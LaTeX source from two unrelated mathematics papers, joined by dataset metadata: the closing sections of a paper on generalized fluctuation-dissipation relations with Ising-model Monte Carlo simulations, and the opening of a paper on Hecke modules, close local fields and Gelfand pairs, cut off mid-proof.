of $\beta$ for the corresponding isotherm.}%
\label{anomalous.eps}%
\end{center}
\end{figure}
Certainly, we unknown how the external magnetic influence expressed
in Eq.(\ref{ans.mag}) could be implemented in a real experimental
situation. Fortunately, their consequences are very easy to check
with the help of Monte Carlo simulations. Let us consider the known
2D Ising model on the square lattice $L\times L$ with periodic
boundary condition:
\begin{equation}
U=-\sum_{\left\langle ij\right\rangle }s_{i}s_{j},~M=\sum_{i}s_{i},
\end{equation}
where the sum $\left\langle ij\right\rangle $ considers
nearest-neighbor interactions only, and the spin variables
$s_{i}=\pm1$. The above equilibrium conditions can be easily
implemented by using a Metropolis method with acceptance probability
$p=p\left( U,M\left\vert U+\Delta U,M+\Delta M\right. \right) $:
\begin{equation}
p=\min\left\{ \exp\left[ -\beta\Delta U+\beta H^{\omega}\Delta
M\right]
\right\} ,\label{as.met}%
\end{equation}
which is a particular expression of Eq.(\ref{met.b}). By denoting
$m=M/N$ the magnetization per particle, the external magnetic field
in this study is given by $H^{\omega}=\bar{H}+\lambda\left(
m-\bar{m}\right) $, where $\bar{m}$ and $\bar{H}$ are suitable
estimation of the expectation values $\left\langle m\right\rangle $
and $\left\langle H^{\omega}\right\rangle $. Our interest is to
obtain the isotherms of 2D Ising model within anomalous regions with
$\chi_{T}<0$. Thus, the values of parameters $\left(
\bar{H},\bar{m}\right) $ can iteratively provide by using the
isothermal magnetic susceptibility per particle $\bar{\chi}_{T}$ of
a previous simulation throughout the expression:
\begin{equation}
\bar{H}_{i+1}=\bar{H}_{i}+\left( \bar{\chi}_{T}\right)
_{i}^{-1}\left(
\bar{m}_{i+1}-\bar{m}_{i}\right) ,\label{ser}%
\end{equation}
where the step $\Delta m=\bar{m}_{i+1}-\bar{m}_{i}$ should be small.
The initial value $\bar{m}_{0}$ is assumed to be the average of
magnetization obtained from an ordinary Metropolis Monte Carlo
simulation with $H^{\omega }=\bar{H}_{0}\sim const$
($\lambda\equiv0$) far enough from the unstable
region with $\chi_{T}<0$, $\bar{m}_{0}=\left\langle m\right\rangle $.%
\begin{figure}
[t]
\begin{center}
\includegraphics[
height=2.5in, width=3.4in
]%
{comparison.eps}%
\caption{Isotherms for $L=25$ and $\beta=0.46$ obtained from
Metropolis Monte Carlo simulations based on the Boltzmann-Gibbs
distributions (BG) where $H^{\omega}=H\sim
const\rightarrow\left\langle \delta H^{\omega}\delta M\right\rangle
=0$ and the present Metropolis Monte Carlo simulations with
$\left\langle \delta H^{\omega}\delta M\right\rangle \not =0$.}%
\label{comparison.eps}%
\end{center}
\end{figure}
Although any real value of coupling constant $\lambda$ satisfying
stability condition (\ref{mag.cond}) is admissible, it is desirable
to impose some criterium in order to reduce thermal dispersions of
the system magnetization (\ref{iso.sus2}) and the external magnetic
field (\ref{iso.sus3}). Our interest is to obtain the isotherms in
the $H-M$ diagram, and hence, an optimal value for $\lambda$ can be
chosen in order to minimize the total dispersion
$\sigma^{2}=\sigma_{H}^{2}+\sigma_{m}^{2}$, where:
\begin{equation}
\sigma_{H}^{2}=N\left\langle \left(\delta
H^{\omega}\right)^{2}\right\rangle
\end{equation}
is the thermal dispersion of the external magnetic field. The
analysis yields:
\begin{equation}
\lambda_{op}=\sqrt{a^{2}+1}-a,
\end{equation}
where $a$ is the inverse of the isothermal magnetic susceptibility
per particle, $a=\bar{\chi}_{T}^{-1}$, whose value can be estimated
from the previous simulation as the case of parameters $\left(
\bar{H},\bar{m}\right) $ in Eq.(\ref{ser}). Notice that this optimal
value guarantees the validity of stability condition
(\ref{mag.cond}).
Results of extensive Monte Carlo simulations by using the procedure
explained above are shown in FIG.\ref{anomalous.eps}. We have used a
square lattice with $L=25$ and considered $n=10^{6}$ iterations for
each calculated point. This results clearly revealed the presence of
anomalous diamagnetic states $\bar{\chi}_{T}<0$ for
inverse temperatures $\beta$ above the critical point $\beta_{c}^{L=25}%
\simeq0.41$. We only show here macrostates with $\left\langle
m\right\rangle
>0$ due to the underlying symmetry $M\rightarrow-M$ and $H\rightarrow-H$ of
the Enthalpy $G=U-HM$.
As clearly shown in FIG.\ref{comparison.eps}, while the 2D Ising
model isotherms are able to describe a backbending in the $H-M$
diagram under a magnetic influence obeying stability condition
(\ref{mag.cond}), they merely undergo a sudden jump in magnetization
in turns to the point $H=0$ under the influence of a constant
magnetic field, that is, a situation with $\lambda=0$. As already
commented, such a sudden jump is interpreted as the occurrence of a
discontinuous phase transition in conventional statistical
mechanics, whose existence is a direct manifestation of the presence
of an unstable branch with negative susceptibilities $\chi_{T}<0$.
Our Monte Carlo simulations show that such an anomalous region can
turn accessible with an appropriate selection of the external
experimental conditions. The present results can be extended to the
case of fluid systems. In fact, the behavior of the 2D Ising model
isotherms is fully analogous to the well-known backbending of Van
der Waal gas isotherms in the $p-V$ diagram, which is associated
with macrostates with negative isothermal compressibilities
$K_{T}<0$ \cite{Reichl}.
\section{Final remarks}
We have obtained in this work a generalization of equilibrium
fluctuation-dissipation relations compatible with the existence of
macrostates with anomalous response functions, Eq.(\ref{gfdr}). Such
a development has been carried out by starting from a generic
extension of the Boltzmann-Gibbs distribution and its control
thermodynamic parameters $\left( \beta,Y\right) $ that characterize
the external thermodynamic influence of an environment,
Eqs.(\ref{new}) and (\ref{eff.temp}). Since the environment
thermodynamic control parameters turn, in general,
\textit{fluctuating quantities}, a new operational definition
(\ref{operational.def}) for the concept of response function has
been also considered. Remarkably, the physics behind the generalized
equilibrium fluctuation-dissipation relations (\ref{gfdr}) is quite
simple. The key ingredient relies on the that the environment
thermodynamic parameters $\left\{\beta^{e}_{i}\right\}$ undergo in
general correlated fluctuations with the system observables
$\left\{I^{i}\right\}$ as a consequence of the underlying
thermodynamic interaction. Such a realistic behavior, systematically
disregarded by the using of Boltzmann-Gibbs distributions
(\ref{bg.w}), leads to the consideration of a new correlation matrix
$\mathcal{M}$ in the equilibrium fluctuation-dissipation relations,
Eq.(\ref{A2.FR}), which characterizes the existence of these
correlative effects. The new theorem explicitly expresses that the
system fluctuating behavior and its thermodynamic stability
crucially depend on the nature of the external influence of the
environment.
As example of applications, we have obtained particular expressions
of the generalized equilibrium fluctuation-dissipation relations for
a fluid and magnetic systems. After, we have derived two criteria of
thermodynamic stability accounting for the existence of negative
heat capacities: Eq.(\ref{Thirring.eq}), for systems with
short-range interactions ensuring the existence of a \textit{thermal
contact}; and Eq.(\ref{astro.cond}), for a metastable equilibrium
involving long-range interactions between a globular cluster and its
nearby galaxy. Finally, we have arrived at a stability condition
compatible with anomalous isothermal susceptibilities associated
with the occurrence of a discontinuous phase transition in magnetic
systems, Eq.(\ref{mag.cond}), whose consequences have been also
numerically tested throughout Monte Carlo simulations.
We would like mention some open questions deserving a special
attention in future works:
\begin{itemize}
\item The usual equilibrium fluctuation-dissipation relations
(\ref{can1})\ constitute a particular expression of the so-called
\textit{fluctuation-dissipation theorem}:
\begin{equation}
\beta C^{ij}\left( \tau\right) =\frac{1}{i\pi}P\int_{-\infty}^{+\infty}%
\frac{\chi^{ij}\left( \omega\right) }{\omega}\cos\left(
\omega\tau\right)
d\omega,\label{FDT}%
\end{equation}
relating correlations and response functions in linear response
theory \cite{Reichl}. The present generalization of equilibrium
fluctuation-dissipation relations inspired a corresponding extension
of this last fundamental result.
\item The numerical study of the 2D Ising model clearly shows that
the present ideas are very useful in order to implement some new
Monte Carlo algorithms inspired on statistical mechanics \cite{mc3}
in order to access to macrostates with anomalous response functions.
\item At first glance, rigorous fluctuations relations (\ref{fundamental}) and
(\ref{assoc.fluct}) clearly exhibit a \textit{tensorial character}, which
suggests a direct connection of the present approach with some geometric
formulations of fluctuation theory developed in the past \cite{Weinhold,rupper}.
A preliminary analysis of such a question is presented in a recent paper
\cite{vel.geo}.
\end{itemize}
\section*{Acknowledgements}
It is a pleasure to acknowledge partial financial support by
FONDECYT 3080003. Velazquez also thanks the partial financial
support by the project PNCB-16/2004 of the Cuban National Programme
of Basic Sciences.
\section*{References}
| 2024-02-18T23:40:05.973Z | 2010-05-19T02:00:16.000Z | algebraic_stack_train_0000 | 1,330 | 14,325 |
|
proofpile-arXiv_065-6707 | \section{Introduction}
\marginpar{$\longleftarrow$} Local fields of positive characteristic can be approximated by local fields of characteristic zero. If $F$ and $E$ are local fields, we say that they are $m$-close if $O_F/\mathcal P_F^m \cong O_E/\mathcal P_E^m$, where $O_F, O_E$ are the rings of integers of $F$ and
$E$, and $\mathcal P_F,\mathcal P_E$ are their maximal ideals. \Dima{For example, $F_p((t))$ is $m$-close to $\mathbb Q_p(\sqrt[m]{p})$.}
\Dima{More generally, for any local field $F$ of positive characteristic $p$ and any $m$ there exists a (sufficiently ramified) extension of $\mathbb Q_p$ that is $m$-close to $F$.}
Let $G$ be a reductive group defined over $\mathbb Z$. For any local
field $F$ and conductor $\ell \in \mathbb Z_{\geq 0}$, the Hecke algebra
$\mathcal H_{\ell}(G(F))$ is finitely generated and finitely presented. Based
on this fact, Kazhdan showed in \cite{Kaz} that for any $\ell$ there
exists $m \geq \ell$ such that the algebras $\mathcal H_{\ell}(G(F))$ and $
\mathcal H_{\ell}(G(E))$ are isomorphic for any $m$-close fields $F$ and
$E$. This allows one to transfer certain results in representation theory of reductive groups from
local fields of zero characteristic to local fields of positive
characteristic.
In this paper we investigate a relative version of this technique.
\Dima{Let $G$ be a reductive group and $H$ be a spherical subgroup.
Suppose for simplicity that both are defined over $\mathbb Z$.}
In the first part of the paper
we consider the space ${\mathcal S}(G(F)/H(F))^{\Dima{K}}$ of \Dima{compactly supported}
functions
on $G(F)/H(F)$ which are invariant with respect to \Dima{a compact open}
subgroup \Dima{$K$}. We prove under certain assumption on the pair
$(G,H)$ that this space is finitely generated (and hence finitely
presented) over the Hecke algebra $\mathcal H_{\Dima{K}}(G(F))$.
\Dima{\begin{introtheorem}[see Theorem \ref{FinGen}] \lbl{IntFinGen}
Let $F$ be a (non-Archimedean) local field. Let $G$ be a
reductive group and $H<G$ be an algebraic subgroup both defined over $F$. Suppose that
for any parabolic subgroup $P \subset G$, there is a finite number
of double cosets $P(F) \setminus G(F) / H(F)$. Suppose also that
for any irreducible smooth representation $\rho$ of $G(F)$ we have
\begin{equation} \lbl{IntFinMult}
\dim\Hom_{H(F)}(\rho|_{H(F)}, \mathbb C) < \infty .
\end{equation}
Then for any \Dima{compact open}
subgroup $K<G(F)$, the space
${\mathcal S}(G(F)/H(F))^{K}$ is a finitely generated module over the
Hecke algebra $\mathcal{H}_{K}(G(F))$.
\end{introtheorem}}
Assumption (\ref{IntFinMult}) is rather weak in light of the
results of \cite{Del,SV}. In particular, it holds for all
symmetric pairs over fields of characteristic different from 2.
One can easily show that the converse is also true. Namely, that if
${\mathcal S}(G(F)/H(F))^{K}$ is a finitely generated module over the
Hecke algebra $\mathcal{H}_K(G(F))$ for any \Dima{compact open}
subgroup
$K<G(F)$, then (\ref{IntFinMult}) holds.
\begin{remark*}
Theorem \ref{IntFinGen} implies that, if $\dim\Hom_{H(F)}(\rho|_{H(F)}, \mathbb C)$ is finite, then it is bounded on every Bernstein component.
\end{remark*}
In the second part of the paper we introduce the notion of a
uniform spherical pair and prove for them the following analog of
Kazhdan's theorem.
\begin{introtheorem} \lbl{thm:ModIso}[See Theorem \ref{thm:phiModIso}]
\Dima{Let $H <G$ be reductive groups defined over
$\mathbb Z$. Suppose that the pair $(G,H)$ is uniform spherical.}
\Removed{ and the module
${\mathcal S}(G(F)/H(F))^{K_{\ell}(F)}$ is finitely generated over the Hecke
algebra $\mathcal H_{\ell}(G(F))$ for any $F$ and $l$.}
Then for any $l$ there
exists $n$ such that for any $n$-close local fields $F$ and $E$,
the module ${\mathcal S}(G(F)/H(F))^{K_{\ell}(F)}$ over the algebra $\mathcal H_{\ell}(G(F))$
is isomorphic to the module ${\mathcal S}(G(E)/H(E))^{K_{\ell}(E)}$ over the
algebra $\mathcal H_{\ell}(G(E))$\nir{, where we identify $\mathcal H_{\ell}(G(F))$ and $\mathcal H_{\ell}(G(E))$ using Kazhdan's isomorphism.}
\end{introtheorem}
\Dima{In fact, we prove a more general theorem, see \S \ref{sec:UniSPairs}.}
\Removed{ Together with Theorem \ref{IntFinGen} }
This implies the following
corollary.
\begin{introcorollary}\lbl{cor:GelGel}
Let $(G,H)$ be a uniform spherical pair of reductive groups
defined over $\mathbb Z$. Suppose that
\begin{itemize}
\item For any local field $F$, and any parabolic subgroup $P \subset G$, there is a finite number
of double cosets $P(F) \setminus G(F) / H(F)$.
\Removed{ \item For any local field $F$ and any irreducible smooth representation $\rho$ of $G(F)$ we have
$$\dim\Hom_{H(F)}(\rho|_{H(F)}, \mathbb C) < \infty .$$ }
\item For any local field $F$ of characteristic zero the pair $(G(F),H(F))$ is a Gelfand pair, i.e. for
any irreducible smooth representation $\rho$ of $G(F)$ we have
$$\dim\Hom_{H(F)}(\rho|_{H(F)}, \mathbb C) \leq 1 .$$
\end{itemize}
Then for any local field $F$ the pair $(G(F),H(F))$ is a Gelfand
pair.
\end{introcorollary}
\Dima{In fact, we prove a more general theorem, see \S \ref{sec:UniSPairs}.}
\begin{remark*}
In a similar way one can deduce an analogous corollary for cuspidal representations. Namely, suppose that the first two conditions of the last corollary hold and the third condition holds for all cuspidal representations $\rho$. Then for any local field $F$ the pair $(G(F),H(F))$ is a cuspidal Gelfand pair: for any irreducible smooth cuspidal representation $\rho$ of $G(F)$ we have
$$\dim\Hom_{H(F)}(\rho|_{H(F)}, \mathbb C) \leq 1 .$$
\end{remark*}
\DimaGRCor{
\begin{remark*}
Originally, we included in the formulation of Theorem \ref{thm:ModIso} an extra condition: we demanded that the module
${\mathcal S}(G(F)/H(F))^{K_{\ell}(F)}$ is finitely generated over the Hecke
algebra $\mathcal H_{\ell}(G(F))$ for any $F$ and $l$. This was our original motivation for Theorem \ref{IntFinGen}.
Later we realized that this condition just follows from the definition of uniform spherical pair. However, we think that Theorem \ref{IntFinGen} and the technique we use in its proof have importance of their own.
\end{remark*}}
In the last part of the paper we apply our technique to show
that $(\GL_{n+1},\GL_n)$ is a strong Gelfand pair over any local
field and $(\GL_{n+k},\GL_n \times \GL_k)$ is a Gelfand pair over
any local field of odd characteristic.
\begin{introtheorem} \lbl{thm:Mult1}
Let $F$ be any local field. Then $(\GL_{n+1}(F),\GL_n(F))$ is a
strong Gelfand pair, i.e. for any irreducible smooth
representations $\pi$ of $\GL_{n+1}(F)$ and $\tau$ of $\GL_{n}(F)$
we have
$$\dim \Hom_{\GL_{n}(F)} (\pi, \tau) \leq 1.$$
\end{introtheorem}
\begin{introtheorem} \lbl{thm:UniLinPer}
Let $F$ be any local field. Suppose that $\operatorname{char} F \neq 2$. Then
$(\GL_{n+k}\Dima{(F)},\GL_n\Dima{(F)} \times \GL_k\Dima{(F)})$ is a Gelfand pair.
\end{introtheorem}
We deduce these theorems from the zero characteristic case, which
was proven in \cite{AGRS} and \cite{JR} respectively. The proofs
in \cite{AGRS} and \cite{JR} cannot be directly adapted to the
case of positive characteristic since they rely on Jordan
decomposition which is problematic in positive characteristic, local fields of positive characteristic being non-perfect.
\begin{remark*}
In \cite{AGS}, a special case of Theorem \ref{thm:Mult1} was
proven for all local fields; namely the case when $\tau$ is
one-dimensional.
\end{remark*}
\begin{remark*}
In \cite{AG_AMOT} and (independently) in \cite{SZ}, an analog of
Theorem \ref{thm:Mult1} was proven for Archimedean local fields.
In \cite{AG_HC}, an analog of Theorem \ref{thm:UniLinPer} was
proven for Archimedean local fields.
\end{remark*}
\subsection{Structure of the paper}$ $
\Dima{In Section \ref{sec:PrelNot} we introduce notation and give some general preliminaries.}\Rami{\\
In Section \ref{sec:FinGen} we prove Theorem \ref{IntFinGen}.
In Subsection \ref{subsec:prel} we collect a few general facts for the proof. One is a criterion, due to Bernstein, for finite generation of the space of $K$-invariant vectors in a representation of a reductive group $G$; the other facts concern homologies of $l$-groups. In Subsection \ref{subsec:desc.cusp} we prove the main inductive step in the proof of Theorem \ref{IntFinGen}, and in Subsection \ref{SecPfFinGen} we prove Theorem \ref{IntFinGen}. Subsection \ref{subsec:homologies} is devoted to the proofs of some facts about the homologies of $l$-groups.\\
In Section \ref{sec:UniSPairs} we prove Theorem \ref{thm:ModIso} and derive Corollary \ref{cor:GelGel}.
In Subsection \ref{subsec:UniSpairs} we introduce the notion of uniform spherical pair. In Subsection \ref{subsec:CloseLocalFields} we prove the theorem and the corollary.\\
We apply our results in Section \ref{sec:ap}. In Subsection \ref{subsec:JR} we prove that the pair $(\GL_{n+k}, \GL_n \times\GL_k )$ satisfies the assumptions of Corollary \ref{cor:GelGel} over fields of characteristic different from 2. In Subsections \ref{subsec:GL} and \ref{subsec:PfGood} we prove that the pair
$(\GL_{n+1}\times\GL_n , \Delta \GL_n)$ satisfies the assumptions of Corollary \ref{cor:GelGel}.
These facts imply Theorems \ref{thm:Mult1} and \ref{thm:UniLinPer}.
\subsection{Acknowledgments}$ $
We thank {\bf Joseph Bernstein} for directing us to the paper
\cite{Kaz}.
We also thank {\bf Vladimir Berkovich}, {\bf Joseph Bernstein}, {\bf Pierre Deligne},
{\bf Patrick Delorme}, {\bf Jochen Heinloth}, \RGRCor{{\bf Anthony Joseph,}}
{\bf David Kazhdan} ,{\bf Yiannis
Sakelaridis}, and {\bf Eitan Sayag} for fruitful discussions and the referee for many useful remarks.
A.A. was supported by a BSF grant, a GIF grant, an ISF Center
of excellency grant and ISF grant No. 583/09.
N.A. was supported by NSF grant DMS-0901638.
D.G. was supported by NSF grant DMS-0635607. Any opinions, findings and conclusions or recommendations expressed in this material are those of the authors and do not necessarily reflect the views of the National Science Foundation.
\section{Preliminaries and notation} \lbl{sec:PrelNot}
\begin{defn}
A local field is a locally compact complete non-discrete topological field. In this paper we will consider only non-Archimedean local fields. All such fields have discrete valuations.
\end{defn}
\begin{remark}
Any local field of characteristic zero and residue characteristic $p$ is a finite extension of the field $\mathbb Q_p$ of $p$-adic numbers and any local field of characteristic $p$ is a finite extension of the field $\mathbb F_p((t))$ of formal Laurent series over the field with $p$ elements.
\end{remark}
\begin{notn}
For a local field $F$ we denote by $val_F$ its valuation, by $O_F$ the ring of integers and by $\mathcal P_F$ its unique maximal ideal.
For an algebraic group $G$ defined over $O_F$ we denote by $K_{\ell}(G,F)$ the kernel of the (surjective) morphism $G(O_F)\to G(O_F/\mathcal P_F^{\ell})$. If $\ell>0$ then we call $K_{\ell}(G,F)$ the $\ell$-th congruence subgroup.
\end{notn}
\Rami{
We will use the terminology of $l$-spaces and $l$-groups introduced in \cite{BZ}. An $l$-space is a locally compact second countable totally disconnected topological space, an $l$-group is a $l$-space with a continuous group structure. For \Dima{further background} on $l$-spaces, $l$-groups and their representations we refer the reader to \cite{BZ}.}
\begin{notn}
Let $G$ be an $l$-group.
Denote by
$\mathcal M(G)$ the category of smooth \nir{complex} representations of $G$.
Define the functor of coinvariants $CI_G:\mathcal M(G) \to Vect$ by
$$CI_G(V):= V/({\operatorname{Span}}\{v-gv\, | \, v\in V, \, g\in G\}).$$
Sometimes we will also denote $V_G:=CI_G(V)$.
\end{notn}
\begin{notn}
For an $l$-space $X$ we denote by
${\mathcal S}(X)$ the space of locally constant compactly supported complex valued functions on $X
\Rami{. If X is an analytic variety over a non-Archimedean local field, we denote}
by $\mathcal M(X)$ the space of locally constant compactly supported measures on $X$.
\end{notn}
\begin{notn}
For an $l$-group $G$ and an open compact subgroup $K$ we denote by
$\mathcal H(G,K)$ or $\mathcal H_K(G)$ the Hecke algebra of $G$ w.r.t. $K$, i.e. the algebra of compactly supported measures on $G$ that are invariant w.r.t. both left and right multiplication by $K$.
For a local field $F$ and a reductive group $G$ defined over $O_F$ we will also denote $\mathcal H_{\ell}(G(F)):=\mathcal H_{K_{\ell}(G)}(G(F))$.
\end{notn}
\nir{\begin{notn}
By a reductive group over a ring $R$, we mean a smooth group scheme over $\Spec(R)$ all of whose geometric fibers are reductive and connected.
\end{notn}}
\section{Finite Generation of Hecke Modules} \lbl{sec:FinGen}
The goal of this section is to prove Theorem \ref{IntFinGen}.
In this section $F$ is a fixed (non-Archimedean) local field of
arbitrary characteristic. All the algebraic groups and algebraic
varieties that we consider in this section are defined over $F$. \nir{In particular, reductive means reductive over $F$}.
\nir{For the reader's convenience, we now give an overview of the argument. In Lemma \ref{VKFinGen} we present a criterion, due to Bernstein, for the finite generation of spaces of $K$-invariants. The proof of the criterion uses the theory of Bernstein Center. This condition is given in terms of all parabolic subgroups of $G$. We directly prove this condition when the parabolic is $G$ (this is Step 1 in the proof of Theorem \ref{IntFinGen}). The case of general parabolic is reduced to the case where the parabolic is $G$. For this, the main step is to show that the assumptions of the theorem imply similar assumptions for the Levi components of the parabolic subgroups of $G$. This is proved in Lemma \ref{FinMultCuspDesc} by stratifying the space $G(F)/P(F)$ according to the $H(F)$-orbits inside it.
}
\Dima{In the proof of this lemma we use two homological tools: Lemma \ref{FinDimH1H0} that which gives a criterion for finite dimensionality of the first homology of a representation and
Lemma \ref{LemShap} which connects the homologies of a representation and of its induction.}
\subsection{Preliminaries} \lbl{subsec:prel}
\Dima{
\begin{notn}
For $l$-groups $H<G$ we denote by $ind_H^G: \mathcal M(H) \to \mathcal M(G)$ the compactly supported induction functor and by $Ind_H^G: \mathcal M(H) \to \mathcal M(G)$ the full induction functor.
\end{notn}
}
\begin{defn}
\Dima{Let $G$ be a reductive group, let $P<G$ be a parabolic subgroup with unipotent radical $U$, and let $M:=P/U$.
Such $M$ is called a Levi subquotient of $G$.
Note that every representation of $M(F)$ can be considered as a representation of $P(F)$ using the quotient morphism $P \twoheadrightarrow M$.
Define:
\begin{enumerate}
\item The Jacquet functor $r_{GM}:\mathcal M(G(F)) \to \mathcal M(M(F))$ by $r_{GM}(\pi):=(\pi|_{P(F)})_{U(F)}$.
\item The parabolic induction functor $i_{GM}:\mathcal M(M(F)) \to \mathcal M(G(F))$ by $i_{GM}(\tau):=ind_{P(F)}^{G(F)}(\tau)$.
\end{enumerate}
Note that
$i_{GM}$ is right adjoint to $r_{GM}$.
A representation $\pi$ of $G(F)$ is called cuspidal if $r_{GM}(\pi)=0$ for any Levi subquotient $M$ of $G$.}
\end{defn}
\begin{definition}
Let $G$ be an $l$-group. A smooth representation $V$ of $G$ is
called \textbf{compact} if for any $v \in V$ and $\xi \in
\widetilde{V}$ the matrix coefficient function defined by
$m_{v,\xi}(g):= \xi(gv)$ is a compactly supported function on $G$.
\end{definition}
\begin{theorem}[Bernstein-Zelevinsky]\lbl{CompProj}
Let $G$ be an $l$-group. Then any compact representation of $G$ is
a projective object in the category $\mathcal M(G)$.
\end{theorem}
\begin{definition}
Let $G$ be a reductive group. \\
(i) Denote by $G^1$ the preimage in $G(F)$ of the maximal compact
subgroup of $G(F)/[G,G](F)$.\\
(ii) Denote $G_0:=G^1Z(G(F))$.\\
(iii) A complex character of $G(F)$ is called unramified if it is trivial
on $G^1$. We denote the \Dima{set} of all unramified
characters by $\Psi_G$. \Dima{Note that $G(F)/G^1$ is a lattice and therefore we can identify $\Psi_G$ with $(\mathbb C^{\times})^n$. This defines a structure of algebraic variety on $\Psi_G$.}\\
(iv) \Dima{For any smooth representation $\rho$ of $G(F)$ we denote
$\Psi(\rho):= ind_{G^1}^G(\rho|_{G^1})$. Note that $\Psi(\rho) \simeq \rho \otimes \mathcal O(\Psi_G),$
where $G(F)$ acts only on the first factor, but this action depends on the second factor.
This identification gives a structure of $\mathcal O(\Psi_G)$-module on $\Psi(\rho)$.}
\end{definition}
\nir{\begin{rem} The definition of unramified characters above is not the standard one, but it is more convenient for our purposes.
\end{rem}}
\begin{theorem}[Harish-Chandra]\lbl{CuspComp}
Let $G$ be a reductive group and $V$ be a cuspidal representation
of $G(F)$. Then $V|_{G^1}$ is a compact representation of $G^1$.
\end{theorem}
\begin{corollary} \lbl{CuspProj}
Let $G$ be a reductive group and $\rho$ be a cuspidal
representation
of $G(F)$. Then\\
(i) $\rho|_{G^1}$ is a projective object in the category
$\mathcal M(G^1)$.\\
(ii) $\Psi(\rho)$ is a projective object in the category
$\mathcal M(G(F))$.
\end{corollary}
\begin{proof}
(i) is clear.\\
(ii) note that $$Hom_G(\Psi(\rho),\pi) \cong
Hom_{G/G_1}(\mathcal O(\Psi_M),Hom_{G^1}(\rho,\pi)),$$
for any representation $\pi$. Therefore the functor $\pi \mapsto
Hom_G(\Psi(\rho),\pi)$ is a composition of two exact functors and
hence is exact.
\end{proof}
\Dima{
\begin{defn}
Let $G$ be a reductive group and $K<G(F)$ be a compact open subgroup. Denote $$\mathcal M(G,K):= \{V \in \mathcal M(G(F))\, | V \text{ is generated by }V^K\}$$ and $$\mathcal M(G,K)^{\bot}:=
\{V \in \mathcal M(G(F)\, | V^K = 0\}.$$
We call $K$ a splitting subgroup if the category $\mathcal M(G(F))$ is the direct sum of the categories $\mathcal M(G,K)$ and $\mathcal M(G,K)^{\bot}$, and $\mathcal M(G,K) \cong \mathcal M(\mathcal H_K(G))$. \nir{Recall that an abelian category $\mathcal{A}$ is a direct sum of two abelian subcategories $\mathcal{B}$ and $\mathcal{C}$, if every object of $\mathcal{A}$ is isomorphic to a direct sum of an object in $\mathcal{B}$ and an object in $\mathcal{C}$, and, furthermore, that there are no non-trivial
\Dima{ morphisms }
between objects of $\mathcal{B}$ and $\mathcal{C}$.}
\end{defn}
}
We will use the following statements from Bernstein's theory on
the center of the category $\mathcal M(G)$.
\Dima{Let $P<G$ be a parabolic subgroup and $M$ be the reductive quotient of $P$.}
\begin{enumerate}
\item \lbl{1} \Dima{ The set of splitting subgroups defines a basis at 1 for the topology of $G(F)$.} \nir{If $G$ splits over
\Rami{$O_F$}
then, for any large enough $\ell$, the congruence subgroup $K_\ell(G,F)$ is splitting.}
\item \lbl{2} \Dima{Let $\overline{P}$ denote the parabolic subgroup of $G$ opposite to $P$, and let $\overline{r}_{GM}:\mathcal M(G(F)) \to \mathcal M(M(F))$ denote the Jacquet functor defined using $\overline{P}$.
Then $\overline{r}_{GM}$ is right adjoint to $i_{GM}$. In particular, $i_{GM}$ maps projective objects to projective ones and hence for any irreducible cuspidal
representation $\rho$
of $M(F)$,
$i_{GM}(\Psi(\rho))$ is a projective object of $\mathcal M(G(F))$.}
\item \lbl{3} Denote by $\mathcal M_{\rho}$ the subcategory of $\mathcal M(G(F))$
generated by $i_{GM}(\Psi(\rho))$. Then $$\mathcal M(G,K) =
\oplus_{(M,\rho) \in B_K} \mathcal M_{\rho},$$ where $B_K$ is some finite
set of pairs consisting of a Levi subquotient of $G$ and its cuspidal
representation. Moreover, for any Levi subquotient $M<G$ and a
cuspidal representation $\rho$ of $M(F)$ such that $\mathcal M_{\rho}
\subset \mathcal M(G,K)$ there exist $(M',\rho ' )\in B_K$ such that
$\mathcal M_{\rho} = \mathcal M_{\rho '}$.
\item \lbl{4} $End(i_{GM}(\Psi(\rho)))$ is finitely generated over
$\mathcal O(\Psi)$ \nir{which is finitely generated over the center of the ring
$End(i_{GM}(\Psi(\rho)))$. The center of the ring $End(i_{GM}(\Psi(\rho)))$ is equal to the center \Dima{$Z(\mathcal M_{\rho})$} of the category $\mathcal M_{\rho}$.}
\end{enumerate}
For statements \ref{1} \Dima{see e.g. \cite[pp. 15-16]{BD} and \cite[\S 2]{HcHvDJ}.}
For
statement \ref{2} see \cite{BerSec} or \cite[Theorem 3]{Bus}.
For statements \ref{3},\ref{4} see \cite[Proposition 2.10,2.11]{BD}.
\Dima{We now present} a criterion, due to Bernstein, for finite generation of the space $V^K$, consisting of vectors in a representation $V$ that are invariant with respect to \Dima{a compact open}
subgroup $K$.
\Rami{
\begin{lemma} \lbl{VKFinGen}
Let $V$ be a smooth representation of $G(F)$. Suppose that for any
parabolic $P<G$ and any irreducible cuspidal representation $\rho$
of $M(F)$ (where $M$ denotes the \Dima{reductive quotient}
of $P$),
$ \Hom_{G(F)}(i_{GM}(\Psi(\rho)),V)$ is a finitely generated
module over $\mathcal O(\Psi_M)$. Then $V^K$ is a finitely generated
module over $\Dima{Z(\mathcal{H}_K(G(F)))}$, for any compact open
subgroup $K<G(F)$.
\end{lemma}
}
\begin{proof}$ $\\
\Rami{
Step 1. Proof for the case when $K$ is splitting and $V=i_{GM}(\Psi(\rho))$ for some Levi
subquotient $M$ of $G$ and an irreducible cuspidal representation $\rho$
of $M(F).$
\Dima{Let $P$ denote the parabolic subgroup that defines $M$ and $U$ denote its unipotent radical.
Denote $K_M:=K/(U\Dima{(F)}\cap K)<M\Dima{(F)}$.}
If $V^K=0$ there is nothing to prove. Otherwise $\mathcal M_{\rho}$ is a
direct summand of $\mathcal M(G,K)$. Now
$$V^K = \Psi(\rho)^{K_M} = \rho^{K_M} \otimes \mathcal O(\Psi).$$
Hence $V^K$ is finitely generated over $Z(\mathcal M_{\rho})$. Hence
$V^K$ is finitely generated over $Z(\mathcal M(G,K)) = Z(\mathcal H_K(G))$.
}
\Rami{
Step 2. Proof for the case when $K$ is splitting and $V \in \mathcal M_{\rho}$ for some Levi
subquotient $M<G$ and an irreducible cuspidal representation $\rho$
of $M(F)$.
}
\Rami{
Let $$\phi: i_{GM}(\Psi(\rho)) \otimes \Hom(i_{GM}(\Psi(\rho)),V)
\twoheadrightarrow V$$ be the natural epimorphism. We are given that
$\Hom(i_{GM}(\Psi(\rho)),V)$ is finitely generated over
$\mathcal O(\Psi)$. Hence it is finitely generated over $Z(\mathcal M(\rho))$.
Choose some generators $\alpha_1, ..., \alpha_n \in
\Hom(i_{GM}(\Psi(\rho))$. Let $$\psi: i_{GM}(\Psi(\rho))^n
\hookrightarrow i_{GM}(\Psi(\rho)) \otimes
\Hom(i_{GM}(\Psi(\rho)),V)$$ be the corresponding morphism.
$Im(\phi \circ \psi)$ is $Z(\mathcal M(\rho))$-invariant and hence
coincides with $Im(\phi)$. Hence $\phi \circ \psi$ is onto. The
